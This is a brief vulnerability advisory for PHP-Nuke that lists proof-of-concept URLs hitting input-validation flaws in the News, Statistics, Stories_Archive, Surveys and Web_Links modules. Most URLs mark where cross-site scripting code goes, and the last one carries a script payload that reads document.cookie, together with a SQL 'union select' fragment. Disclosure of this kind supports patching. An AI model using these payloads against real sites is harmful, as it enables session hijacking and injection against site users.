PHP-Nuke Multiple Input Validation Vulnerabilities

PHP-Nuke Multiple Input Validation Vulnerabilities

The following proof of concept is available:
http://www.example.com/nuke73/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar
http://www.example.com/nuke73/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here]
http://www.example.com/nuke73/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=[xss
code here]&month=05&month_l=May
http://www.example.com/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss
code here]&month_l=May
http://www.example.com/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss
code here]&order=0&thold=0
http://www.example.com/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://www.example.com/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]
http://www.example.com/nuke73/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>